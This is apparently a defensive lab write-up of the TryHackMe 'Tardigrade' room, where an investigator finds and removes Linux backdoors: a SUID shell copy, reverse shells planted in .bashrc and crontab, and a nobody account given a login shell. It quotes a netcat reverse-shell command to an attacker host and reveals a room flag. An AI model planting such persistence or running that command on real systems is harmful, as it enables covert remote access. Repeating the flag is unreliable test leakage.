We covered three of the most common Linux persistence techniques: commands planted in a user's .bashrc file, scheduled tasks in crontab, and a modified account in /etc/passwd. This was part of the TryHackMe Tardigrade room.

A server has been compromised, and the security team has decided to isolate the machine until it’s been thoroughly cleaned up. Initial checks by the Incident Response team revealed that there are five different backdoors. It’s your job to find and remediate them before giving the signal to bring the server back to production.

A dirty wordlist is essentially raw documentation of the investigation from the investigator's perspective. It may contain anything that helps move the investigation forward, from actual IOCs to random notes. Keeping one assures the investigator that a specific IOC has already been recorded, which keeps the investigation on track and prevents getting stuck in a loop of leads that have already been exhausted.

It also helps the investigator remember the mindset they had at each point of the investigation. Recording that mindset is usually neglected in favour of the more exciting atomic indicators; however, it provides the context for why a specific item was recorded in the first place, and that context is how pivot points are chosen and further leads are generated and pursued.

The advantages of a dirty wordlist don't end there. Cleaning it up at the end of the investigation is a quick way to produce the formal documentation of findings. It is therefore recommended to put in every detail that might help during the investigation; at the end, it is easy to remove the unneeded details and false leads, enrich the actual IOCs, and establish points of emphasis. The flag for this task is: THM{d1rty_w0rdl1st}

Investigating the giorgio Account

I started by connecting to the machine over SSH with the provided credentials for the user giorgio. I checked the user's privileges with id and sudo -l and found that giorgio could run any command as root. In giorgio's home directory (/home/giorgio), I listed all files, including hidden ones, with ls -la and found a suspicious file named badbash with the SUID bit set and owned by root. Running ./badbash spawned a new shell. A root-owned SUID copy of a shell is itself a backdoor: whoever can execute it gets a process with effective UID 0 (bash drops the privilege unless started with -p), so it goes into the dirty wordlist as the first finding.

I then examined the .bashrc file with cat .bashrc and found an alias for ls whose body was a Bash reverse shell. Because .bashrc is sourced every time the user starts an interactive shell, the alias is redefined at each login, and the reverse shell fires the next time giorgio runs ls. Next, I checked giorgio's scheduled tasks with crontab -e (crontab -l lists them without opening an editor, which is the safer choice on a live incident) and found a job that used netcat to open a reverse shell to the attacker's IP and port; this is another persistence method. To find the server's OS version, I used cat /etc/lsb-release.

Investigating the root Account

I switched to the root user with su root. Shortly after logging in as root, a "netcat: timeout" error message appeared, followed by a suspicious command echoed in the terminal: netcat -e /bin/bash <attacker_IP> 6969, another attempt to establish a reverse shell (the timeout is consistent with the server having been isolated from the attacker's host). To find its source, I examined root's .bashrc with cat /root/.bashrc and found the line responsible for initiating the netcat connection at every login.

Investigating the System (Password File)

I inspected /etc/passwd with cat /etc/passwd to look for suspicious accounts and found that the nobody account had /bin/bash as its login shell, with /nonexistent as its home directory. On Debian and Ubuntu, /nonexistent is the stock home directory for nobody, but its stock shell is /usr/sbin/nologin, so the shell is the modification: the attacker repurposed an existing system account as a backdoor instead of adding a new, more conspicuous line to /etc/passwd. I changed into /nonexistent (cd /nonexistent), a directory that does not exist on a clean install, and listed its contents with ls -la. Inside I found a file named .youfoundme; viewing it with cat .youfoundme revealed the final flag for the challenge.

Summary of Persistence Mechanisms Covered

  1. .bashrc file modifications: adding commands or aliases to a file that is sourced at every interactive shell start, so that a reverse shell runs at login (or, for an alias, whenever the aliased command is run).
  2. Crontab (scheduled tasks): scheduling commands such as netcat reverse shells to run at regular intervals, independent of any user logging in.
  3. /etc/passwd manipulation: giving an existing system account (such as nobody) a valid login shell, or adding a new account, to create a backdoor login.

This video demonstrates common ways attackers can maintain access to a compromised Linux system.

Technical Commands Used

  • id
  • sudo -l
  • ls -la
  • ./badbash
  • cat .bashrc
  • crontab -e
  • cat /etc/lsb-release
  • su root
  • cat /root/.bashrc
  • cat /etc/passwd
  • cd /nonexistent
  • cat .youfoundme

TryHackMe Tardigrade Room Answers

What is the server’s OS version?

What’s the most interesting file you found in giorgio’s home directory?


In every investigation, it’s important to keep a dirty wordlist to keep track of all your findings, no matter how small. It’s also a way to prevent going back in circles and starting from scratch again. As such, now’s a good time to create one and put the previous answer as an entry so we can go back to it later.

Another file that can be found in every user’s home directory is the .bashrc file. Can you check if you can find something interesting in giorgio’s .bashrc?


It seems we’ve covered the usual bases in giorgio’s home directory, so it’s time to check the scheduled tasks that he owns.

Did you find anything interesting about scheduled tasks?

This section is a bonus discussion on the importance of a dirty wordlist. Accept the extra point and happy hunting!

What is the flag?

A few moments after logging on to the root account, you find an error message in your terminal.

What does it say?


After moving forward with the error message, a suspicious command appears in the terminal as part of the error message.

What command was displayed?


You might wonder, "how did that happen? I didn't even do anything. I just logged in as root, and it happened."

Can you find out how the suspicious command has been implemented?

There’s one more persistence mechanism in the system.

A good way to systematically dissect the system is to look for “usuals” and “unusuals”. For example, you can check for commonly abused or unusual files and directories.

This specific persistence mechanism is directly tied to something (or someone?) already present in fresh Linux installs and may be abused and/or manipulated to fit an adversary’s goals. What’s its name?

What is the last persistence mechanism?

Finally, as you’ve already found the final persistence mechanism, there’s value in going all the way through to the end.

The adversary left a golden nugget of “advise” somewhere.

What is the nugget?

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
